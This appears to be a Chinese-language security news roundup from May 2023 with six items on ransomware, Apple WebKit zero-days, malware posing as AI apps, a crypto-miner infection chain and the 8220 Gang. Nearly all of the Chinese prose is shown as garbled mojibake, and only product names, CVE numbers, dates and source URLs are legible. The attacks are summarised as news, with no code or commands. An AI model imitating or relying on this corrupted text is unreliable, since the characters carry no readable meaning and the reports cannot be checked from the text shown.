ÐÂÀÕË÷Èí¼þMalasLockerÒªÇóÄ¿±êÏò´ÈÉÆ»ú¹¹¾è¿î

Ðû²¼Ê±¼ä 2023-05-19

1¡¢ÐÂÀÕË÷Èí¼þMalasLockerÒªÇóÄ¿±êÏò´ÈÉÆ»ú¹¹¾è¿î


¾ÝýÌå5ÔÂ17ÈÕ±¨µÀ £¬ÐÂÀÕË÷Èí¼þMalasLockerͨ¹ýÈëÇÖZimbra·þÎñÆ÷À´ÇÔÈ¡Óʼþ²¢¼ÓÃÜÎļþ¡£µ«¹¥»÷Õß²¢Ã»ÓÐÒªÇóÄ¿±ê½»Êê½ð £¬¶øÊÇÒªÇóËûÃÇÏòÖ¸¶¨µÄ·ÇÓªÀû´ÈÉÆ»ú¹¹¾è¿î¡£¸Ã»î¶¯Ê¼ÓÚ3ÔÂµ× £¬ÔÚ¼ÓÃܵç×ÓÓʼþʱ £¬Ëü²»»áÔÚÎļþÃû¸½¼ÓÌØ±ðµÄÀ©Õ¹Ãû¡£µ«ËûÃÇÔÚÿ¸ö¼ÓÃÜÎļþµÄĩβ¶¼¸½¼ÓÁËÒ»¸ö"´ËÎļþÒѼÓÃÜ £¬Çë¼ì²ìREADME.txtÁ˽â½âÃÜ˵Ã÷"µÄÐÅÏ¢¡£Ä¿Ç°Éв»Çå³þ¹¥»÷ÕßÊÇÈçºÎÈëÇÖZimbra·þÎñÆ÷¡£MalasLockerµÄÍøÕ¾Ä¿ÒѹûÈ»Èý¼Ò¹«Ë¾µÄÊý¾ÝºÍÆäËû169¸ö±»¹¥»÷ÕßµÄZimbraÅäÖá£


https://www.bleepingcomputer.com/news/security/malaslocker-ransomware-targets-zimbra-servers-demands-charity-donation/


2¡¢AppleÐÞ¸´iPhone¡¢MacºÍiPadÖÐÈý¸öÒѱ»ÀûÓõÄ©¶´


5ÔÂ18ÈÕ £¬AppleÐû²¼Äþ¾²¸üР£¬ÐÞ¸´ÁËiPhone¡¢MacºÍiPadÖÐÈý¸öÒѱ»ÀûÓõÄ©¶´¡£ÕâЩ©¶´¾ùÔÚ¶àÆ½Ì¨WebKitä¯ÀÀÆ÷ÒýÇæÖб»·¢ÏÖ £¬·Ö±ðÊÇ¿ÉÓÃÀ´Í»ÆÆWebÄÚÈÝɳÏäµÄɳÏäÌÓÒÝ©¶´£¨CVE-2023-32409£©¡¢·ÃÎÊÃô¸ÐÐÅÏ¢µÄÔ½½ç¶Áȡ©¶´£¨CVE-2023-28204£©ºÍÖ´ÐÐÈÎÒâ´úÂëµÄÊͷźóʹÓé¶´£¨CVE-2023-32373£©¡£Appleͨ¹ý¸ïнçÏÞ¼ì²é¡¢ÊäÈëÑéÖ¤ºÍÄÚ´æ¹ÜÀí½â¾öÁËÕâЩÎÊÌâ £¬Ã»ÓйûÈ»ÓйØÕâЩ¹¥»÷µÄÏêϸÐÅÏ¢¡£×ÔÄê³õÒÔÀ´ £¬AppleÒÑÐÞ¸´ÁË6¸öÁãÈÕ©¶´¡£ 


https://securityaffairs.com/146411/security/apple-3-new-zero-day-bugs.html


3¡¢BatLoaderÔÚ½üÆÚ¹¥»÷ÖÐð³äChatGPTºÍMidjourney


eSentireÔÚ5ÔÂ16ÈÕ³ÆÆä·¢ÏÖÁËBatLoaderð³äChatGPTºÍMidjourneyµÄ¹¥»÷»î¶¯¡£Ñо¿ÈËÔ±³Æ £¬ÕâÁ½ÖÖAI·þÎñ¶¼·Ç³£ÊÜ»¶Ó­ £¬µ«ÊÇûÓйٷ½µÄ¶ÀÁ¢Ó¦Ó÷¨Ê½ £¬Óû§Ö»ÄÜͨ¹ýÍøÂç½çÃæºÍDiscordÓëChatGPTºÍMidjourney½»»¥¡£¹¥»÷ÕßÀûÓÃÁËÕâÖÖ¿Õȱ £¬½«ËÑË÷AIÓ¦Ó÷¨Ê½µÄÓû§Òýµ½Ã°ÅÆÍøÒ³¡£ÔÚð³äChatGPTµÄ»î¶¯ÖÐ £¬BatLoaderͨ¹ýMSIX Windows App InstallerÎļþºÍRedline StealerÀ´Ñ¬È¾É豸¡£ÔÚð³äMidjourneyµÄ»î¶¯ÖÐ £¬»áÏÂÔØÓÉAshana Global Ltd.Ç©ÃûµÄWindowsÓ¦Ó÷¨Ê½°ü¡£


https://www.esentire.com/blog/batloader-impersonates-midjourney-chatgpt-in-drive-by-cyberattacks


4¡¢¼¼ÊõÌṩÉÌScanSourceÔâµ½ÀÕË÷¹¥»÷ÍøÕ¾ÔÝʱÎÞ·¨·ÃÎÊ


¾Ý5ÔÂ17ÈÕ±¨µÀ £¬¼¼ÊõÌṩÉÌScanSource͸¶ÆäÔâµ½ÀÕË÷¹¥»÷ £¬²¿ÃÅϵͳ¡¢ÒµÎñÔËÓªºÍ¿Í»§ÃÅ»§Êܵ½Ó°Ïì¡£5ÔÂ15ÈÕ¿ªÊ¼ £¬ScanSourceµÄ¿Í»§³ÆÎÞ·¨·ÃÎʹ«Ë¾µÄÍøÕ¾¡£Ö®ºó £¬¸Ã¹«Ë¾Ö¤ÊµËûÔÚ5ÔÂ14ÈÕÔâµ½ÁËÀÕË÷¹¥»÷¡£´Ë´Î¹¥»÷µÄÓ°ÏìÊǾ޴óµÄ £¬ÒòΪ¸Ã¹«Ë¾Ëµ £¬ÔÚδÀ´Ò»¶Îʱ¼äÄÚ £¬Ïò¿Í»§ÌṩµÄ·þÎñ½«»á·ºÆðÑÓ³Ù £¬Ô¤¼Æ½«Ó°Ïì±±ÃÀºÍ°ÍÎ÷µÄÒµÎñ¡£´ËÍâ £¬Æä¹É¼ÛÔÚ5ÔÂ17ÈÕϵøÁË1.42% £¬Õâ¿ÉÄÜÊǹ¥»÷Ôì³ÉµÄÓ°Ïì¡£


https://www.bleepingcomputer.com/news/security/scansource-says-ransomware-attack-behind-multi-day-outages/


5¡¢KasperskyÅû¶¶ñÒâ¿ó¹¤Minas¹¥»÷»î¶¯µÄ¼¼Êõϸ½Ú   

 

KasperskyÓÚ5ÔÂ17ÈÕÅû¶Á˶ñÒâ¿ó¹¤Minas¹¥»÷»î¶¯µÄ¼¼Êõϸ½Ú¡£Ñо¿ÈËÔ±´ÓÖ´ÐÐPowerShell¿ªÊ¼Öؽ¨ÁËËüµÄѬȾÁ´£ºPowerShell½Å±¾Í¨¹ýÈÎÎñ¼Æ»®·¨Ê½ÔËÐÐ £¬²¢´ÓÔ¶³Ì·þÎñÆ÷ÏÂÔØlgntoerr.gifÎļþ £¬½âÃܺóÉú³É.NET DLL £¬²¢´ÓÆä×ÊÔ´ÖÐÌáÈ¡ºÍ½âÃÜÈý¸öÎļþ £¬×îºó»áÔÚÄÚ´æÖÐÌáÈ¡²¢Æô¶¯¿ó¹¤DLL¡£Ñо¿ÈËÔ±³Æ £¬MinasÊÇÒ»¸öʹÓó߶ÈʵÏÖµÄ¿ó¹¤ £¬Ö¼ÔÚÒþ²ØÆä´æÔÚ¡£Ä¿Ç°ÎÞ·¨Íêȫȷ¶¨×î³õµÄPowerShellÃüÁîÊÇÈçºÎÖ´ÐÐµÄ £¬µ«ÖÖÖÖ¼£Ïó±íÃ÷ÊÇͨ¹ýGPOÖ´ÐеÄ¡£


https://securelist.com/minas-miner-on-the-way-to-complexity/109692/


6¡¢Trend MicroÐû²¼¹ØÓÚ8220 GangмÆÄ±µÄ·ÖÎö³ÂËß


5ÔÂ16ÈÕ £¬Trend MicroÐû²¼Á˹ØÓÚ8220 GangмÆÄ±µÄ·ÖÎö³ÂËß¡£¸ÃÍÅ»ï×î½ü¼¸¸öÔÂÒ»Ö±ºÜ»îÔ¾ £¬ËüÀûÓÃÁËOracle WebLogic ServerÖеÄ©¶´£¨CVE-2017-3506£©À´·Ö·¢PowerShell £¬È»ºóÔÚÄÚ´æÖд´½¨ÁíÒ»¸ö»ìÏýµÄPowerShell½Å±¾¡£Õâ¸öеĽű¾»á½ûÓÃWindows AMSI¼ì²â²¢Æô¶¯Ò»¸öWindows¶þ½øÖÆÎļþ £¬ËüËæºó»áÁ¬½Óµ½Ô¶³Ì·þÎñÆ÷ÒÔ¼ìË÷payload¡£´ËÍâ £¬¹¥»÷»¹ÀûÓÃÁËÒ»ÖֺϷ¨Linux¹¤¾ßlwp-download £¬ÓÃÓÚÔÚÄ¿±êÖ÷»úÉÏÉú´æÈÎÒâÎļþ¡£ 


https://www.trendmicro.com/en_us/research/23/e/8220-gang-evolution-new-strategies-adapted.html